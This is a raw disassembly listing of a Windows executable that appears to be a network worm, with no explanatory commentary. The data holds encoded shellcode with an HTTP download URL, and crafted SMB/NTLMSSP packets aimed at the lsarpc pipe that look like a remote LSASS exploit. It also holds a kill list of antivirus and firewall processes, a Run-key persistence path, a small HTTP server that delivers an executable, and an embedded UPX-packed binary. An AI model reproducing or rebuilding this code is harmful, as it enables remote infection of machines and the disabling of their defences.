sub_43F91D proc near ; CODE XREF: .data:0043EDDE�p
jmp dword ptr ds:loc_40538C
sub_43F91D endp
; ---------------------------------------------------------------------------
db 90h
dd 90h
db 0
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_43F929 proc near ; CODE XREF: sub_43E245+6B�p
; sub_43E245+8E�p ...
jmp dword ptr ds:loc_405390
sub_43F929 endp
; ---------------------------------------------------------------------------
db 90h
dd 90h
db 0
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_43F935 proc near ; CODE XREF: sub_43F609+17�p
jmp dword ptr ds:loc_405394
sub_43F935 endp
; ---------------------------------------------------------------------------
db 90h
dd 90h
db 0
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_43F941 proc near ; CODE XREF: .data:0043E3FC�p
; .data:0043E418�p
jmp dword ptr ds:loc_405396+2
sub_43F941 endp
; ---------------------------------------------------------------------------
db 90h
dd 90h, 17h dup(0)
dd 40300000h, 40311000h, 800000h, 22h dup(0)
dd 5000h, 0
dd 34303400h, 746F4E20h, 756F6620h, 2900646Eh, 0D960413Ah
dd 170A0705h, 27251F1Bh, 2AC9C5ACh, 0DF7F5F3Ch, 746845EBh
dd 2F3A7074h, 3732312Fh, 2 dup(3030302Eh), 3130302Eh, 3030303Ah
dd 662F3038h, 0AEAE6273h, 335DAE62h, 0A0B966C9h, 5758D01h
dd 68AFE8Bh, 575993Ch, 2C068A46h, 99344630h, 0E2470788h
dd 0E80AEBEDh, 0FFFFFFDAh, 99999999h, 41E41499h, 0C9994671h
dd 0C999C999h, 712FE414h, 99C9994Eh, 0F3C999C9h, 0C999F19Dh
dd 99C99989h, 0C999F1C9h, 999CC999h, 0C999F3C9h, 99988B71h
dd 67C999C9h, 10F0E3F3h, 9998931Ch, 0F3C999C9h, 414C999h
dd 0C999989Bh, 71CAC999h, 99C99963h, 0BC999C9h, 10A7C196h
dd 0C999671Ch, 0C999C999h, 9666611Ah, 0C999091Dh, 0C999C999h
dd 0C8C850B2h, 1498F3C8h, 71C941DCh, 99C99936h, 4EC999C9h
dd 1291C0A4h, 0ED599249h, 0C959B2EFh, 14C9C9C9h, 0CBCA2FC4h
dd 0C9990C71h, 0C999C999h, 21E424FFh, 0C7ED5992h, 99F1CDCDh
dd 9CC999C9h, 2C66C999h, 0C9999893h, 71C9C999h, 99C999E3h
dd 0FBC999C9h, 6683B8B0h, 9998932Ch, 66C999C9h, 0C999672Ch
dd 0C999C999h, 0C9991471h, 0C999C999h, 0E7C29C9Bh, 99672C66h
dd 99C999C9h, 99E771C9h, 99C999C9h, 31F1AC9h, 149CF3A4h
dd 99989B04h, 0CAC999C9h, 0C999F571h, 0C999C999h, 7126F434h
dd 71C998F3h, 99C999F9h, 77C999C9h, 14865973h, 496624D4h
dd 0C999CB71h, 0C999C999h, 0EF133BF9h, 0A13729F9h, 0DE9AED9Eh
dd 9E5F6072h, 5AF8C999h, 0C999A9C1h, 2 dup(0C999C999h)
dd 0B7FBEAFFh, 99FCE1FCh, 4 dup(99C999C9h), 0F934C7C9h
dd 25B459AAh, 0C9662A2Ah, 819093ACh, 909CC9B7h, 0C983639Dh
dd 999271CDh, 99C999C9h, 3519BFC9h, 0BDFD1451h, 91720A95h
dd 71F934C7h, 99C999C8h, 12C999C9h, 0D512A5D2h, 529AE180h
dd 8D146FAAh, 0B9C89A2Ah, 4A9A8B12h, 595859AAh, 0DB9BAB9Eh
dd 0C999A319h, 0DDA26CECh, 9EED85BDh, 81E8A2DFh, 125544EBh
dd 4A9ABDC8h, 0EB8D2E96h, 9A85D812h, 99D125Ah, 0DD105A9Ah
dd 10F885BDh, 9998971Ch, 66C999C9h, 0FD7F6649h, 0A98712FEh
dd 0C212C999h, 85C21295h, 0C2128212h, 0FDC65A91h, 0C6EAFAh
dd 85000000h, 424D53FFh, 72h, 0C8531800h, 3 dup(0)
dd 0FEFF0000h, 0
dd 2006200h, 4E204350h, 4F575445h, 50204B52h, 52474F52h
dd 31204D41h, 200302Eh, 4D4E414Ch, 2E314E41h, 57020030h
dd 6F646E69h, 66207377h, 5720726Fh, 676B726Fh, 70756F72h
dd 2E332073h, 2006131h, 2E314D4Ch, 30305832h, 4C020032h
dd 414D4E41h, 312E324Eh, 544E0200h, 204D4C20h, 32312E30h
dd 0
dd 53FFA400h, 73424Dh, 18000000h, 0C807h, 3 dup(0)
dd 0FEFFh, 0FF0C0010h, 400A400h, 0A11h, 0
dd 2000h, 0D4000000h, 69800000h, 4C544E00h, 5053534Dh
dd 100h, 8829700h, 0E0h, 3 dup(0)
dd 570000h, 6E0069h, 6F0064h, 730077h, 320020h, 300030h
dd 200030h, 310032h, 350039h, 570000h, 6E0069h, 6F0064h
dd 730077h, 320020h, 300030h, 200030h, 2E0035h, 30h, 0
dd 0FFDA0000h, 73424D53h, 0
dd 0C80718h, 3 dup(0)
dd 0FEFF00h, 0C002008h, 0DA00FFh, 0A1104h, 0
dd 570000h, 0
dd 800000D4h, 544E009Fh, 53534D4Ch, 30050h, 10000h, 460001h
dd 0
dd 470000h, 0
dd 400000h, 0
dd 400000h, 60000h, 400006h, 100000h, 470010h, 8A150000h
dd 48E088h, 44004Fh, 6A198100h, 49E4F27Ah, 30AF281Ch, 67107425h
dd 69005753h, 64006E00h, 77006F00h, 20007300h, 30003200h
dd 30003000h, 32002000h, 39003100h, 3500h, 69005700h, 64006E00h
dd 77006F00h, 20007300h, 30003200h, 30003000h, 35002000h
dd 30002E00h, 2 dup(0)
dd 53FF5C00h, 75424Dh, 18000000h, 0C807h, 3 dup(0)
dd 800FEFFh, 0FF040030h, 8005C00h, 31000100h, 5C0000h
dd 31005Ch, 320039h, 31002Eh, 380036h, 31002Eh, 32002Eh
dd 300031h, 49005Ch, 430050h, 24h, 3F3F3F3Fh, 3Fh, 0FF640000h
dd 0A2424D53h, 0
dd 0C80718h, 3 dup(0)
dd 4DC08h, 18004008h, 0DEDE00FFh, 16000E00h, 0
dd 9F000000h, 201h, 2 dup(0)
dd 3000000h, 1000000h, 40000000h, 2000000h, 3000000h, 5C000011h
dd 73006C00h, 72006100h, 63007000h, 0
dd 9C000000h, 424D53FFh, 25h, 0C8071800h, 3 dup(0)
dd 4DC0800h, 500800h, 48000010h, 0
dd 4, 2 dup(0)
dd 48005400h, 2005400h, 2600h, 10005940h, 50005Ch, 500049h
dd 5C0045h, 0
dd 30B0005h, 10h, 48h, 1, 10B810B8h, 0
dd 1, 10000h, 3919286Ah, 11D0B10Ch, 0C000A89Bh, 0F52ED94Fh
dd 0
dd 8A885D04h, 11C91CEBh, 8E89Fh, 6048102Bh, 2, 0C000000h
dd 4D53FFF4h, 2542h, 7180000h, 0C8h, 2 dup(0)
dd 0DC080000h, 60080004h, 1000h, 0CA0h, 400h, 2 dup(0)
dd 540000h, 540CA0h, 260002h, 0CB14000h, 50005C10h, 50004900h
dd 5C004500h, 0
dd 500h, 1003h, 0CA000h, 100h, 0C8800h, 9000000h, 3EC00h
dd 0
dd 3EC00h, 14950000h, 30040h, 707C0000h, 10040h, 0
dd 10000h, 0
dd 10000h, 0
dd 10000h, 0
dd 10000h, 0
dd 10000h, 0
dd 10000h, 0
dd 10000h, 0
dd 707C0000h, 10040h, 0
dd 10000h, 0
dd 707C0000h, 10040h, 0
dd 10000h, 0
dd 707C0000h, 10040h, 0
dd 10000h, 0
dd 85780000h, 5BAB0013h, 0E9A6h, 0FFF81000h, 2F424D53h
dd 0
dd 0C80718h, 3 dup(0)
dd 0FEFF08h, 0E006008h, 0DEDE00FFh, 4000h, 0FFFF0000h
dd 8FFFFh, 10B8h, 4010B8h, 0
dd 5EE10B9h, 10010000h, 0B8000000h, 1000010h, 0C000000h
dd 20h, 0AD000900h, 0Dh, 0AD000000h, 0Dh, 0D80F0000h, 424D53FFh
dd 25h, 0C8071800h, 3 dup(0)
dd 1180800h, 700800h, 84000010h, 0Fh, 4, 2 dup(0)
dd 84005400h, 200540Fh, 2600h, 0F9540h, 50005Ch, 500049h
dd 5C0045h, 0
dd 2000005h, 10h, 0F84h, 1, 0F6Ch, 90000h, 0
dd 40A89A00h, 100h, 0
dd 100h, 0
dd 100h, 0
dd 100h, 0
dd 100h, 0
dd 100h, 0
dd 100h, 0
dd 100h, 0
dd 40A89A00h, 100h, 0
dd 100h, 0
dd 40A89A00h, 100h, 0
dd 100h, 0
dd 40A89A00h, 100h, 0
dd 100h, 10h dup(0)
dd 460000h, 101h, 0Dh dup(0)
dd 15123C00h, 275h, 0Dh dup(0)
dd 1C123C00h, 75h, 0Eh dup(0)
dd 0EC816600h, 0E4FF071Ch, 100h, 404CF700h, 404CE900h
dd 200h, 180h, 404CF700h, 404CE000h, 100h, 180h, 404CF700h
dd 404CCF00h, 200h, 80h, 0
dd 404CB500h, 0
dd 404C9C00h, 2 dup(0)
dd 404C8C00h, 2 dup(0)
dd 404C8200h, 2 dup(0)
dd 404C6900h, 2 dup(0)
dd 404C5000h, 2 dup(0)
dd 404C4300h, 2 dup(0)
dd 404C3300h, 100h, 0
dd 404C2C00h, 100h, 4049F800h, 404C2400h, 100h, 0
dd 404C1900h, 2 dup(0)
dd 404C1200h, 100h, 0
dd 404C0C00h, 100h, 0
dd 404C0300h, 100h, 0
dd 404BFC00h, 100h, 0
dd 404BF300h, 100h, 0
dd 404BEC00h, 100h, 0
dd 404BE500h, 100h, 0
dd 404BDD00h, 100h, 0
dd 404BD700h, 100h, 404A0800h, 404BD000h, 100h, 0
dd 404BC800h, 100h, 0
dd 404BC100h, 100h, 0
dd 404BBB00h, 100h, 0
dd 404BB200h, 100h, 404A1800h, 404BAD00h, 100h, 0
dd 404BA800h, 100h, 404A2800h, 404BA200h, 100h, 0
dd 524F5700h, 6669004Dh, 6F530063h, 61777466h, 4D5C6572h
dd 6F726369h, 74666F73h, 6E69575Ch, 73776F64h, 6B005C00h
dd 6469706Ch, 706C6B00h, 6C6B0066h, 76006669h, 74616473h
dd 746E61h, 6F6D7376h, 6D6B006Eh, 78627378h, 786D6B00h
dd 7369646Eh, 786D6B00h, 736469h, 66786D6Bh, 6D6B0077h
dd 6C696678h, 6D6B0065h, 67666378h, 786D6B00h, 676962h
dd 61786D6Bh, 746E6567h, 786D5500h, 676643h, 41786D55h
dd 746E6567h, 786D5500h, 5500554Ch, 6F50786Dh, 6D53006Ch
dd 72655363h, 65636976h, 69667300h, 7265746Ch, 736E6C00h
dd 317766h, 7074754Fh, 4674736Fh, 77657269h, 6C6C61h, 72616873h
dd 63616465h, 73736563h, 41634D00h, 20656566h, 6D617246h
dd 726F7765h, 6553206Bh, 63697672h, 65440065h, 74636574h
dd 6420726Fh, 664F2065h, 65636966h, 6E616353h, 5A00544Eh
dd 41656E6Fh, 6D72616Ch, 6E615000h, 41206164h, 7669746Eh
dd 73757269h, 726F4E00h, 206E6F74h, 69746E41h, 75726976h
dd 65532073h, 63697672h, 614B0065h, 72657073h, 20796B73h
dd 69746E41h, 6361482Dh, 2E72656Bh, 6B6E6Ch, 656E6F5Ah
dd 62614C20h, 6C432073h, 746E6569h, 6F4D4100h, 6F74696Eh
dd 6F4C0072h, 27206B6Fh, 5320276Eh, 706F74h, 54464F53h
dd 45524157h, 63694D5Ch, 6F736F72h, 575C7466h, 6F646E69h
dd 435C7377h, 65727275h, 6556746Eh, 6F697372h, 75525C6Eh
dd 78006Eh, 253A7325h, 31002F75h, 312E3239h, 252E3836h
dd 75252E75h, 32373100h, 2E75252Eh, 252E7525h, 30310075h
dd 2E75252Eh, 252E7525h, 6EB0075h, 5C0006EBh, 5C73255Ch
dd 24637069h, 2E752500h, 252E7525h, 75252E75h, 54544800h
dd 2E312F50h, 30322031h, 4B4F2030h, 0A0D0A0Dh, 43000A0Dh
dd 65746E6Fh, 4C2D746Eh, 74676E65h, 25203A68h, 0D0A0D75h
dd 5448000Ah, 312F5054h, 3220312Eh, 4F203030h, 430A0D4Bh
dd 65746E6Fh, 542D746Eh, 3A657079h, 70706120h, 6163696Ch
dd 6E6F6974h, 652D782Fh, 632D6578h, 72706D6Fh, 65737365h
dd 0A0D64h, 787878h, 544547h, 300050h, 6 dup(0)
dd 50F400h, 2 dup(0)
dd 57F400h, 524C00h, 513800h, 2 dup(0)
dd 583C00h, 529000h, 514400h, 2 dup(0)
dd 584C00h, 529C00h, 515000h, 2 dup(0)
dd 585C00h, 52A800h, 51AC00h, 2 dup(0)
dd 58C000h, 530400h, 51D800h, 2 dup(0)
dd 58F000h, 533000h, 520C00h, 2 dup(0)
dd 592C00h, 536400h, 1Ah dup(0)
dd 53A000h, 53B000h, 53BC00h, 53C400h, 53D400h, 53E000h
dd 53F000h, 540000h, 540800h, 541400h, 542000h, 542C00h
dd 543400h, 543C00h, 544800h, 2 dup(0)
dd 545400h, 2 dup(0)
dd 547000h, 2 dup(0)
dd 548C00h, 549C00h, 54B000h, 54C800h, 54D800h, 54EC00h
dd 54FC00h, 550C00h, 551C00h, 553000h, 554800h, 556000h
dd 557000h, 558000h, 558C00h, 559800h, 55A800h, 55B000h
dd 55BC00h, 55C800h, 55D800h, 2 dup(0)
dd 55E800h, 55F400h, 560800h, 561800h, 562C00h, 564000h
dd 565400h, 566800h, 567800h, 2 dup(0)
dd 568C00h, 56A400h, 56B800h, 56C800h, 56DC00h, 56EC00h
dd 570000h, 571400h, 572400h, 573400h, 574800h, 2 dup(0)
dd 575C00h, 576400h, 577400h, 578000h, 578800h, 579400h
dd 57A000h, 57A800h, 57B000h, 57BC00h, 57C800h, 57D000h
dd 57DC00h, 57E800h, 2 dup(0)
dd 53A000h, 53B000h, 53BC00h, 53C400h, 53D400h, 53E000h
dd 53F000h, 540000h, 540800h, 541400h, 542000h, 542C00h
dd 543400h, 543C00h, 544800h, 2 dup(0)
dd 545400h, 2 dup(0)
dd 547000h, 2 dup(0)
dd 548C00h, 549C00h, 54B000h, 54C800h, 54D800h, 54EC00h
dd 54FC00h, 550C00h, 551C00h, 553000h, 554800h, 556000h
dd 557000h, 558000h, 558C00h, 559800h, 55A800h, 55B000h
dd 55BC00h, 55C800h, 55D800h, 2 dup(0)
dd 55E800h, 55F400h, 560800h, 561800h, 562C00h, 564000h
dd 565400h, 566800h, 567800h, 2 dup(0)
dd 568C00h, 56A400h, 56B800h, 56C800h, 56DC00h, 56EC00h
dd 570000h, 571400h, 572400h, 573400h, 574800h, 2 dup(0)
dd 575C00h, 576400h, 577400h, 578000h, 578800h, 579400h
dd 57A000h, 57A800h, 57B000h, 57BC00h, 57C800h, 57D000h
dd 57DC00h, 57E800h, 0
dd 57003000h, 74534153h, 75747261h, 70h, 61003500h, 70656363h
dd 74h, 62003600h, 646E69h, 63003700h, 65736F6Ch, 6B636F73h
dd 7465h, 63003800h, 656E6E6Fh, 7463h, 67003B00h, 6F687465h
dd 79627473h, 656D616Eh, 67003C00h, 6F687465h, 616E7473h
dd 656Dh, 68004600h, 736E6F74h, 69004700h, 5F74656Eh, 72646461h
dd 69004900h, 5F74656Eh, 616F746Eh, 6C004B00h, 65747369h
dd 6Eh, 72004F00h, 766365h, 73005500h, 646E65h, 73005900h
dd 64747568h, 6E776Fh, 73005A00h, 656B636Fh, 74h, 49008100h
dd 7265746Eh, 4774656Eh, 6F437465h, 63656E6Eh, 53646574h
dd 65746174h, 53004F00h, 74654748h, 63657053h, 466C6169h
dd 65646C6Fh, 74615072h, 4168h, 45008200h, 54746978h, 61657268h
dd 64h, 4700CA00h, 6F437465h, 6E616D6Dh, 6E694C64h, 4165h
dd 4700DE00h, 75437465h, 6E657272h, 6F725074h, 73736563h
dd 6449h, 4700F800h, 69467465h, 6953656Ch, 657Ah, 47010C00h
dd 6F4D7465h, 656C7564h, 646E6148h, 41656Ch, 43001B00h
dd 65736F6Ch, 646E6148h, 656Ch, 47015500h, 69547465h, 6F436B63h
dd 746E75h, 47015C00h, 65567465h, 6F697372h, 6Eh, 47016800h
dd 61626F6Ch, 6464416Ch, 6D6F7441h, 41h, 49019200h, 7265746Eh
dd 6B636F6Ch, 78456465h, 6E616863h, 6567h, 49019400h, 7265746Eh
dd 6B636F6Ch, 6E496465h, 6D657263h, 746E65h, 4C01AD00h
dd 6C61636Fh, 6F6C6C41h, 63h, 43003100h, 74616572h, 6C694665h
dd 4165h, 5201FA00h, 46646165h, 656C69h, 52020E00h, 6E556C74h
dd 646E6977h, 52020F00h, 655A6C74h, 654D6F72h, 79726F6Dh
dd 53026400h, 7065656Ch, 6C02C600h, 63727473h, 416E7970h
dd 6C02C900h, 6C727473h, 416E65h, 43004700h, 74616572h
dd 72685465h, 646165h, 44005400h, 74656C65h, 6C694665h
dd 4165h, 5300FE00h, 69547465h, 72656Dh, 52000200h, 73696765h
dd 43726574h, 7373616Ch, 41h, 47002000h, 654D7465h, 67617373h
dd 4165h, 54002400h, 736E6172h, 6574616Ch, 7373654Dh, 656761h
dd 44002500h, 61707369h, 4D686374h, 61737365h, 416567h
dd 50003D00h, 5174736Fh, 4D746975h, 61737365h, 6567h, 43004F00h
dd 74616572h, 6E695765h, 45776F64h, 4178h, 44005100h, 72747365h
dd 6957796Fh, 776F646Eh, 44005B00h, 69576665h, 776F646Eh
dd 636F7250h, 41h, 4300BF00h, 65736F6Ch, 76726553h, 48656369h
dd 6C646E61h, 65h, 4300C000h, 72746E6Fh, 65536C6Fh, 63697672h
dd 65h, 4400C300h, 74656C65h, 72655365h, 65636976h, 4F00D100h
dd 536E6570h, 6E614D43h, 72656761h, 41h, 4F00D300h, 536E6570h
dd 69767265h, 416563h, 52016700h, 65446765h, 6574656Ch
dd 756C6156h, 4165h, 52017100h, 72436765h, 65746165h, 4579654Bh
dd 4178h, 52017400h, 6C436765h, 4B65736Fh, 7965h, 52017900h
dd 704F6765h, 654B6E65h, 41784579h, 52018400h, 75516765h
dd 56797265h, 65756C61h, 417845h, 52019000h, 65536765h
dd 6C615674h, 78456575h, 41h, 5F00E800h, 616F7469h, 5F001800h
dd 7465475Fh, 6E69614Dh, 73677241h, 5F018100h, 65656C73h
dd 70h, 65020A00h, 746978h, 6D025400h, 70636D65h, 79h
dd 6D025600h, 65736D65h, 74h, 72026000h, 65736961h, 72026100h
dd 646E61h, 73026A00h, 616E6769h, 6Ch, 73026D00h, 6E697270h
dd 6674h, 73026F00h, 646E6172h, 73027100h, 61637274h, 74h
dd 73027200h, 68637274h, 72h, 73028000h, 74737274h, 72h
dd 6F737700h, 32336B63h, 6C6C642Eh, 0Fh dup(40500000h)
dd 4E495700h, 54454E49h, 4C4C442Eh, 40501400h, 45485300h
dd 32334C4Ch, 4C4C442Eh, 40502800h, 52454B00h, 334C454Eh
dd 4C442E32h, 4Ch, 15h dup(40503C00h), 45535500h, 2E323352h
dd 4C4C44h, 9 dup(40505000h), 56444100h, 33495041h, 4C442E32h
dd 4Ch, 0Bh dup(40506400h), 54524300h, 2E4C4C44h, 4C4C44h
dd 0Eh dup(40507800h), 25h dup(0)
dd 2000h, 0
dd 2000h, 100000h, 2A0000h, 300000h, 480000h
db 2 dup(0)
word_4411CA dw 6B51h ; DATA XREF: sub_4039D6+1E�o
db 0
aK0iJ db ' K0i=J ',0 ; DATA XREF: sub_4039D6+7C�o
aKg7x_ db 'kg7x_',0 ; DATA XREF: sub_403AA3+17�o
aOw db 'oW',0 ; DATA XREF: sub_403AA3+54�o
dword_4411DE dd 727838h word_4411E2 dw 494Ch ; DATA XREF: sub_403AA3+12D�o
db 0
aVR db '|+V|;R',0 ; DATA XREF: sub_403AA3+16C�o
aN4U db 'N4/u',0 ; DATA XREF: sub_403C5F+17�o
aVEM db 'v e~m',0 ; DATA XREF: sub_403C5F+140�o
aKPyesn db 'k&PYESN',0 ; DATA XREF: sub_403C5F+16E�o
aAj db 'aJ',0 ; DATA XREF: sub_403C5F+1A8�o
byte_441202 db 0 ; DATA XREF: sub_403C5F+274�o
byte_441203 db 7Fh ; DATA XREF: sub_403C5F+2EA�o
db 6Dh, 0
word_441206 dw 7346h ; DATA XREF: sub_40404B+1E�o
db 0
aUs6arh db ' US6rH',0 ; DATA XREF: sub_40404B+2E�o
align 4
dd 2, 0Ch
dword_44121C dd 7Bh ; sub_4040FC:loc_404122�r ...
byte_441220 db 57h, 3Dh, 0 ; DATA XREF: sub_404194+30�o
byte_441223 db 2Dh ; DATA XREF: sub_404194+43�o
db 56h, 0
aNb_ya db '%&nb.ya',0 ; DATA XREF: sub_404194+B0�o
a@p db ' $~@p',0 ; DATA XREF: sub_404194+EA�o
aP db ' p',0 ; DATA XREF: sub_404194+1E8�o
aVk_0 db ' vK%;',0 ; DATA XREF: sub_404194+21B�o
align 10h
dd 0
dd 0Eh
dword_441248 dd 0 ; .text:loc_4044BC�r ...
dword_44124C dd 0 ; sub_404527+34�r ...
aK0iJ_0 db ' K0i=J ',0 ; DATA XREF: sub_404586+3�o
dw 7
unicode 0, <>,0
dw 0Ah
unicode 0, <>,0
dword_441260 dd 0 ; sub_4045EF:loc_40460F�r ...
aUng9Q db 'unG9 Q',0 ; DATA XREF: sub_404663+68�o
dword_44126B dd 3F3E59h dword_44126F dd 7F3577h dword_441273 dd 562047h byte_441277 db 37h ; DATA XREF: sub_404A38+F3�o
db 74h, 0
dword_44127A dd 256830h byte_44127E db 0 ; DATA XREF: sub_404B85+E1�o
aC6kP9 db 'C6k|P=9',0 ; DATA XREF: sub_404B85+170�o
a04Ku db '04 kU',0 ; DATA XREF: sub_404D49+51�o
word_44128D dw 62h ; DATA XREF: sub_404DE5:loc_404E42�r
aVpa1 db 'PA1',0 ; DATA XREF: sub_404DE5+98�o
a@0y db '@0Y ',0 ; DATA XREF: sub_404DE5+D3�o
word_441299 dw 46h ; DATA XREF: sub_404DE5:loc_404EED�r
align 4
dword_44129C dd 0 dword_4412A0 dd 0Bh dword_4412A4 dd 0 ; sub_404F4F:loc_404F7D�r ...
aU db ':U*~',0 ; DATA XREF: sub_404FEF+C�o
dword_4412AD dd 3C8169h word_4412B1 dw 38h ; DATA XREF: sub_404FEF+79�r
byte_4412B3 db 0 ; DATA XREF: sub_40518F+52�o
dword_4412B4 dd 8 ; sub_4062CD+368�r
dword_4412B8 dd 0Eh ; sub_405F79+1D1�r ...
dword_4412BC dd 0 ; sub_405254:loc_405283�r ...
dword_4412C0 dd 0 aW_07ye db 'W _07ye',0 ; DATA XREF: sub_4053A1+1B�o
word_4412CC dw 31h ; DATA XREF: sub_4053A1+158�r
aXaBi db '#Xa/I',0 ; DATA XREF: sub_405527+C�o
word_4412D5 dw 6Eh ; DATA XREF: sub_405601+10�r
word_4412D7 dw 49h ; DATA XREF: sub_405601+FF�r
word_4412D9 dw 66h ; DATA XREF: sub_405601+10C�r
aMkQe9 db 'mk,qe9',0 ; DATA XREF: sub_405601+204�o
off_4412E2 dd offset word_424C36 ; DATA XREF: sub_405601+226�r
aK_0 db 'K &,',0 ; DATA XREF: sub_405601+27D�o
word_4412EB dw 49h ; DATA XREF: sub_405601+39E�r
byte_4412ED db 37h, 4Dh, 0 ; DATA XREF: sub_405601+3BD�o
aCcvJ8 db 'cc j8',0 ; DATA XREF: sub_405601+649�o
aTbrgnn db 'tRnn',0 ; DATA XREF: sub_405601+69E�o
aHz_B db 'hZ.*~b!',0 ; DATA XREF: sub_405601+6EB�o
byte_441306 db 0 ; DATA XREF: sub_405601+80D�o
aAxq@Mi db 'Axq@;mI',0 ; DATA XREF: sub_405601+8AC�o
dword_44130F dd 782050h a7ynj db ' * 7YNJ',0 ; DATA XREF: sub_405F79+25�o
aCowt9n db 'cowt9N',0 ; DATA XREF: sub_405F79+204�o
aJv_ db '&JV_',0 ; DATA XREF: sub_4062CD+3B�o
byte_441327 db 6Fh ; DATA XREF: sub_4062CD+5E�o
dd 4A7F5231h
db 20h, 66h, 0
byte_44132F db 32h ; DATA XREF: sub_4062CD+7C�o
db 68h, 0
word_441332 dw 3C7Fh ; DATA XREF: sub_4062CD+117�o
dd 726566h
byte_441338 db 3Fh, 3Ah, 0 ; DATA XREF: sub_4062CD+1B1�o
aCayc_ db 'CYc_',0 ; DATA XREF: sub_4062CD+32E�o
aIk db 'Ik',0 ; DATA XREF: sub_4062CD+408�o
dw 7
unicode 0, <>,0
dword_441348 dd 0Ch dword_44134C dd 0 ; sub_4068A2:loc_4068CF�r ...
dword_441350 dd 0 ; sub_406A9A+39�r ...
dword_441354 dd 0 ; sub_406987+1D�r ...
dword_441358 dd 0FFFFh ; sub_406A9A+181�r ...
dword_44135C dd 50733Dh a40? db ':40?',0 ; DATA XREF: sub_406A9A+4D�o
byte_441365 db 0 ; DATA XREF: sub_406A9A+220�o
aNDlyo db 'N DLYO',0 ; DATA XREF: sub_406A9A+26F�o
aT2vxo db 'T2vxO',0 ; DATA XREF: sub_406A9A+2A3�o
aWWavg db 'W',27h,'WAV`',0 ; DATA XREF: sub_406A9A+2CB�o
align 4
dword_44137C dd 1 dword_441380 dd 10h ; sub_406E2B+EEF�r ...
dword_441384 dd 0 ; sub_406D88:loc_406DB6�r ...
dword_441388 dd 1 ; sub_40801C+26�o
byte_44138C db 0 ; DATA XREF: sub_406E2B+FDC�r
align 2
dw 2D36h
dd offset dword_424C38+1AC8h
dword_441394 dd 764075h aOap db 'op*',0 ; DATA XREF: sub_406E2B+92�o
aAcbls db 'AcBLs',0 ; DATA XREF: sub_406E2B+BA�o
word_4413A3 dw 45h ; DATA XREF: sub_406E2B+D1�r
word_4413A5 dw 6Dh ; DATA XREF: sub_406E2B+1EB�r
aJXe? db 'J$xE+?',0 ; DATA XREF: sub_406E2B+203�o
word_4413AE dw 30h ; DATA XREF: sub_406E2B+210�r
byte_4413B0 db 20h, 4Ah, 0 ; DATA XREF: sub_406E2B+223�o
byte_4413B3 db 0 ; DATA XREF: sub_406E2B+258�o
a9ebg db '9EB#',0 ; DATA XREF: sub_406E2B+30E�o
byte_4413BA db 0 ; DATA XREF: sub_406E2B+3AE�o
byte_4413BB db 0 ; DATA XREF: sub_406E2B+3D9�o
a854 db '^85/4=|',0 ; DATA XREF: sub_406E2B+3EE�o
word_4413C4 dw 62h ; DATA XREF: sub_406E2B+4B5�r
aWUn@ db ' w*UN@',0 ; DATA XREF: sub_406E2B+56C�o
word_4413CD dw 39h ; DATA XREF: sub_406E2B:loc_407441�r
aGAkux db ';AKuX',0 ; DATA XREF: sub_406E2B+6CF�o
aEW db ' E~^W',0 ; DATA XREF: sub_406E2B+7A8�o
aUD db 'u;D ',0 ; DATA XREF: sub_406E2B+825�o
asc_4413E1 db '==',0 ; DATA XREF: sub_406E2B+8B2�o
aT6rr db 'T6Rr',0 ; DATA XREF: sub_406E2B+974�o
dword_4413E9 dd 376A3Eh aFA db ',F`>a',0 ; DATA XREF: sub_406E2B+A33�o
byte_4413F3 db 0 ; DATA XREF: sub_406E2B+B71�o
aBmiJ db 'MI ~j',0 ; DATA XREF: sub_406E2B+BC7�o
aVsbag0 db 'SAg0',0 ; DATA XREF: sub_406E2B+BE2�o
byte_441402 db 0 ; DATA XREF: sub_406E2B+CC2�o
word_441403 dw 68h ; DATA XREF: sub_406E2B+D4F�r
dword_441405 dd 3D6643h aSHt db 'S ht|',0 ; DATA XREF: sub_406E2B+EA3�o
aWG db 'W ^',0 ; DATA XREF: sub_406E2B+107E�o
aDXN db 'd:x`n',0 ; DATA XREF: sub_406E2B+10A6�o
word_44141A dw 0FFFFh ; DATA XREF: sub_407F67+5�o
dd 7FEEFFFFh, 7FF90040h
db 40h, 0
aB2U db '2 U ',0 ; DATA XREF: sub_40801C+C�o
align 10h
dd 6
dword_441434 dd 0Bh dword_441438 dd 0 ; sub_4080E0:loc_40810F�r ...
dword_44143C dd 905A4Dh, 3, 4, 0FFFFh, 0B8h, 0 dd 40h, 8 dup(0)
dd 0C8h, 0EBA1F0Eh, 0CD09B400h, 4C01B821h, 685421CDh, 70207369h
dd 72676F72h, 63206D61h, 6F6E6E61h, 65622074h, 6E757220h
dd 206E6920h, 20534F44h, 65646F6Dh, 0A0D0D2Eh, 24h, 13h dup(0)
dd 4550h, 3014Ch, 41CA88F2h, 2 dup(0)
dd 10F00E0h, 6010Bh, 4000h, 1000h, 5000h, 9820h, 6000h
dd 0A000h, 400000h, 1000h, 200h, 4, 0
dd 4, 0
dd 0B000h, 1000h, 0
dd 2, 100000h, 1000h, 100000h, 1000h, 0
dd 10h, 2 dup(0)
dd 0A000h, 0D8h, 1Ch dup(0)
aUpx0 db 'UPX0',0
align 4
dd 5000h, 1000h, 0
dd 400h, 3 dup(0)
dd 0E0000080h, 31585055h, 0
dd 4000h, 6000h, 3A00h, 400h, 3 dup(0)
dd 0E0000040h, 32585055h, 0
dd 1000h, 0A000h, 200h, 3E00h, 3 dup(0)
dd 0C0000040h, 42h dup(0)
dd 0A0000h
aInfoThisFileIs db '$Info: This file is packed with the UPX executable packer http://'
db 'upx.tsx.org $',0Ah,0
aIdUpx1_07Copyr db '$Id: UPX 1.07 Copyright (C) 1996-2001 the UPX Team. All Rights Re'
db 'served. $',0Ah,0
dd 21585055h, 902090Ch, 0A2620A53h, 5F94A837h, 7269h, 381Fh
dd 7000h, 38000426h, 92087EE9h, 905A4D00h, 43B0300h, 0B2C83200h
dd 40B8FFFFh, 377FF97Fh, 1F0E04C8h, 0B4000EBAh, 0B821CD09h
dd 68544C01h, 70207369h, 0FFFFFDBFh, 72676F72h, 63206D61h
dd 6F6E6E61h, 65622074h, 6E757220h, 44026920h, 6D20534Fh
dd 0FF6050EDh, 2E65646Fh, 240A0D0Dh, 134550C7h, 0FF21DBEDh
dd 2014Ch, 41CA888Ah, 0B219DE0h, 0F080601h, 22B37EE9h
dd 18A400E0h, 732510E0h, 6366F925h, 501E020Bh, 0E6760604h
dd 341E0C96h, 59200710h, 0A006F65Eh, 757829E0h, 6FDDB201h
